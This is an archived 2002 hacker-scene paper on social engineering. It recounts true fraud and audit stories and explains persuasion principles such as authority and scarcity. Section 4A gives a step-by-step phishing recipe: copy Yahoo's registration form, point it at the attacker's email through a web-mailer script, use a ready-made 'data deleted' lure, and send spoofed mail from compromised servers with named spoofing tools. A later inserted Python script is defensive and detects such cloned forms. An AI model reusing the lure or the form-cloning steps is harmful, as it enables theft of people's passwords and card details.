Author : simo_at_morx_org
Title : Social Engineering, Definition, true stories and examples
Date : 11/22/2002

1- True stories

An anonymous person called a woman and said he was from her local company's customer service and that, due to a local error, some customer data, including credit card and social security numbers, had been deleted. He then asked the lady to give him her billing information again, including the billing address, first and last name, credit card number, expiry date and social security number that used to be on file before the incident. 20 days later the lady received her billing statement with 2500 $ to be paid for what had been ordered: 1 digital camcorder, 1 laptop, 3 mp3 players and 2 DVD players.

It is not always the case that a hacker is sitting in front of his computer trying to break into private networks by exploiting vulnerable servers in order to get private information such as credit card numbers. Sometimes all he does is make a phone call and exploit human stupidity.

"There's always the technical way to break into a network but sometimes it's easier to go through the people in the company. You just fool them into giving up their own security," says Keith A. Rhodes, chief technologist at the U.S. General Accounting Office, which has a Congressional mandate to test the network security at 24 different government agencies and departments.

Another true story is recounted by Kapil Raina, currently a security expert at Verisign and co-author of mCommerce Security: A Beginner's Guide, based on an actual workplace experience with a previous employer:

One morning a few years back, a group of strangers walked into a large shipping firm and walked out with access to the firm's entire corporate network. How did they do it? By obtaining small amounts of access, bit by bit, from a number of different employees in that firm. First, they did research about the company for two days before even attempting to set foot on the premises. For example, they learned key employees' names by calling HR. Next, they pretended to lose their key to the front door, and a man let them in. Then they "lost" their identity badges when entering the third floor secured area, smiled, and a friendly employee opened the door for them. The strangers knew the CFO was out of town, so they were able to enter his office and obtain financial data off his unlocked computer. They dug through the corporate trash, finding all kinds of useful documents. They asked a janitor for a garbage pail in which to place their contents and carried all of this data out of the building in their hands. The strangers had studied the CFO's voice, so they were able to phone, pretending to be the CFO, in a rush, desperately in need of his network password. From there, they used regular technical hacking tools to gain super-user access into the system.

In this case, the strangers were network consultants performing a security audit for the CFO without any other employees' knowledge. They were never given any privileged information by the CFO but were able to obtain all the access they wanted through social engineering.

2- Definition

I have read too many articles on social engineering defining its basic goals and the different ways used by hackers. The goal is simply the same as in hacking in general: gaining private information from a human through some persuasion and influence in order to perform fraud, espionage, or simply to access a system or a network. Targets can include commercial companies, financial and cultural institutions, hospitals or simply a yahoo account :)

3- Persuasion and influence techniques

A substantial body of literature in social psychology demonstrates that there are at least six factors relying on peripheral routes to persuasion that are highly likely to persuade or influence others.

Authority : People are highly likely, in the right situation, to be highly responsive to assertions of authority, even when the person who purports to be in a position of authority is not physically present. A study of three Midwestern hospitals showed how responsive people can be to such assertions. In the study, 22 separate nurses' stations were contacted by a researcher who identified himself (falsely) as a hospital physician, and told the answering nurse to give 20 milligrams of a specified prescription drug to a particular patient on the ward. Four factors should have indicated that the nurses might have questioned the order: it came from a "doctor" whom the nurse had never before met or spoken to; the "doctor" was transmitting a prescription by telephone, in violation of hospital policy; the drug in question was not authorized for use on the wards; and the dosage that the "doctor" had specified was clearly dangerous, twice the maximum daily dosage. Yet in 95 percent of the cases, the nurse proceeded to obtain the necessary dosage from the ward medicine cabinet and was on her way to administer it to the patient before observers intercepted her and told her of the experiment.

Scarcity : People are also highly responsive to indications that a particular item they may want is in short supply or available for only a limited period. Indeed, research by Dr. Jack Brehm of Stanford University indicates that people come to desire that item even more when they perceive that their freedom to obtain it is or may be limited in some way. The belief that others may be competing for the short supply of the desired item may enhance the person's desire even more.

Liking and similarity : It is a truly human tendency to like people who are like us. Our identification of a person as having characteristics identical or similar to our own -- places of birth, or tastes in sports, music, art, or other personal interests, to name a few -- provides a strong incentive for us to adopt a mental shortcut, in dealing with that person, to regard him or her more favorably merely because of that similarity.

Reciprocation : A well-recognized rule of social interaction requires that if someone gives us (or promises to give us) something, we feel a strong inclination to reciprocate by providing something in return. Even if the favor that someone offers was not requested by the other person, the person offered the favor may feel a strong obligation to respect the rule of reciprocation by agreeing to the favor that the original offeror asks in return -- even if that favor is significantly costlier than the original favor.

Commitment and consistency : Society also places great store by consistency in a person's behavior. If we promise to do something, and fail to carry out that promise, we are virtually certain to be considered untrustworthy or undesirable. We therefore are more likely to take considerable pains to act in ways that are consistent with actions that we have taken before, even if, in the fullness of time, we later look back and recognize that some consistencies are indeed foolish. One way in which social custom and practice makes us susceptible to appeals to consistency is the use of writing. A leading social psychologist, Professor Robert B. Cialdini, has observed that unless there is strong evidence to the contrary, "People have a natural tendency to think that a statement reflects the true attitude of the person who made it." Moreover, once the person who receives such a statement responds by preparing a written statement of his own -- whether a letter, an affidavit, or an e-mail -- it tends to make the writer believe in what he has written as well, adding to the impression that both parties have displayed their true attitudes and beliefs.

Social proof : In many social situations, one of the mental shortcuts on which we rely, in determining what course of action is most appropriate, is to look to see what other people in the vicinity are doing or saying. This phenomenon, known as social proof, can prompt us to take actions that may be against our self-interest without taking the time to consider them more deeply. Cults from the Jonestown Temple to Heaven's Gate, for example, provide cogent evidence of how strong the effects of that phenomenon can be in the right circumstances.

4- Some ways used by hackers

A- Online applications for Internet-fraud purposes : e-mail passwords and credit card numbers

In this section I am going to add an influence that has not been mentioned above, the influence of "greed": let's say someone with an e-mail account somewhere on the net receives a great e-mail giving him the chance to win 10.000 $ or a 2003 Mercedes in reward for just entering his username and password for verification and registration purposes; sometimes the victim is even asked for his credit card and social security number for the same purpose. Basically this technique is often used to steal credit cards from online auction users and web-based e-mail accounts.

The other classic, well-known method is based on the authority influence and consists of sending an e-mail with a form asking the victim to re-enter his username/password or to fill out a new registration form, due to a local error that erased customers' personal information including passwords, dates of birth and secret question answers.
In fact the attacker doesn't need to be a good HTML/Java/PHP programmer to code such forms, or simply doesn't need to bother himself and waste his time coding HTML. In this section I'll explain how easy it is to make online forms and a web server script that gets the data and then sends it back to the sender's e-mail. First of all, I know that most of you know how an HTML POST form works and how the web server script gets the data and then processes it, but let's get an overview, with examples, of how an attacker can easily make a form in sometimes less than 5 minutes.

OK, let's say we are interested in a yahoo account password. In that case the attacker first chooses the type of influence; here he decided to use the authority influence. The bad guy goes first to mail.yahoo.com and tries to sign up for a new account, and guess what he/she gets: a registration form already written (http://edit.yahoo.com/config/eval_register?.v=&.intl=&new=1&.done=&.src=ym&.partner=&.p=&promo=&.last=so). Here we have the form and just need to modify some functions. The second step is to get the HTML source of the page in order to modify it; all we have to do is remove (

The values that have to be set in the modified form are:

- the attacker's e-mail address (where the data will be returned);
- the e-mail subject;
- the victim's IP address and hostname (not really needed);
- where we want the web mail script to redirect the victim after submitting the form; mail.yahoo.com is ideal since he will automatically be redirected into his mailbox.

The message shown to the victim reads: "Due to an involuntary local error your information has been deleted from our database, please take some minutes to re-fill the following. Your information will be immediately recorded after submitting. Thanks."

A pre-coded copy of the above example can be found at www.angelfire/linux/simooo/simohackyahoo.html and an example of a Perl web-based e-mailer can also be found at www.angelfire/linux/simooo/emailer.pl (for educational and demonstration purposes only). Now all the attacker has to do is use one of his compromised servers to send the spoofed e-mail to his victim using an e-mail spoofer like htmlbomb.pl, which can be found at www.morx.org/htmlbomb.txt, or any program like ghosted.exe for Windows, which already includes a list of public SMTP servers; the attacker's spoofed e-mail will look like it comes from admin@yahoo.com or CService@yahoo.com.

Influencing the victim can be done in many forms and many ways: trust, authority, sending HTML forms, attaching backdoors/trojans which would give complete access to the victim's computer. A good example of this was an AOL hack, documented by VIGILANTe: "In that case, the hacker called AOL's tech support and spoke with the support person for an hour. During the conversation, the hacker mentioned that his car was for sale cheaply. The tech supporter was interested, so the hacker sent an e-mail attachment 'with a picture of the car'. Instead of a car photo, the mail executed a backdoor exploit that opened a connection out from AOL through the firewall."
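As an added example (not from the original paper or the pages it links), here is a defender-side check for the cloned-form trick described above: it parses a page's HTML forms and flags any form whose action posts to a host outside the brand's own domain, or that carries hidden fields steering a generic web-mailer script. The hidden field names (recipient, subject, redirect, return) and every host, address and value in the sample are assumptions, not taken from the paper.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse

# Hidden-field names typical of generic CGI web-mailer scripts (assumed, not from the paper).
SUSPECT_HIDDEN = {"recipient", "redirect", "subject", "return"}

class FormAuditor(HTMLParser):
    """Collect every <form> with its action URL and its hidden inputs."""
    def __init__(self):
        super().__init__()
        self.forms = []
        self._cur = None
    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}
        if tag == "form":
            self._cur = {"action": a.get("action", ""), "hidden": {}}
            self.forms.append(self._cur)
        elif tag == "input" and self._cur is not None and a.get("type", "").lower() == "hidden":
            self._cur["hidden"][a.get("name", "")] = a.get("value", "")
    def handle_endtag(self, tag):
        if tag == "form":
            self._cur = None

def audit_forms(html, expected_domain):
    """Return findings for forms whose submission leaves the brand's domain; [] means clean."""
    p = FormAuditor()
    p.feed(html)
    findings = []
    for f in p.forms:
        host = (urlparse(f["action"]).hostname or "").lower()
        # A relative action (empty host) stays on the page's own origin.
        if host and host != expected_domain and not host.endswith("." + expected_domain):
            findings.append(f"form posts off-site to {host}")
        for name, value in f["hidden"].items():
            if name.lower() in SUSPECT_HIDDEN:
                findings.append(f"hidden web-mailer field {name}={value!r}")
    return findings

# Constructed sample: a copied sign-in form whose action now points at a
# third-party mailer script (every host, address and value here is made up).
CLONED_FORM = """
<form method="post" action="http://mailer.example.net/cgi-bin/emailer.pl">
  <input type="hidden" name="recipient" value="collector@example.net">
  <input type="hidden" name="subject" value="re-registration">
  <input type="hidden" name="redirect" value="http://mail.yahoo.com/">
  <input type="text" name="login"> <input type="password" name="passwd">
</form>
"""

if __name__ == "__main__":
    for finding in audit_forms(CLONED_FORM, "yahoo.com"):
        print("SUSPICIOUS:", finding)
```

Run against the constructed sample it reports the off-site action plus the three steering fields; the same check applied to the genuine registration URL quoted above (host edit.yahoo.com, no hidden mailer fields) reports nothing.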
B- Online auctions :

Here we can say that 3 of the psychological influences mentioned above are dominant in these frauds: through the victim's identification of something good that he is prepared to buy immediately at a price he or she considers acceptable; reciprocity, through the criminal's promise to deliver the ordered goods once the victim has sent payment; and similarity, through the victim's willingness to do business with someone who apparently shares his or her interests in the collectible or computer merchandise being sold.

5- Reverse Social Engineering

A final, and advanced, method of gaining valuable information is known as "reverse social engineering". This is when the hacker appears in a position of authority so that employees ask him for information. If analysed, planned and executed well, reverse social engineering attacks may offer the hacker an even better chance of success.

6- Conclusion :

Social Engineering has different ways and purposes: hacking e-mail passwords, credit cards, backdooring and so on. Social Engineering simply stays unpatched, since human influence/ignorance/stupidity will keep existing.

# milw0rm.com [2006-04-08]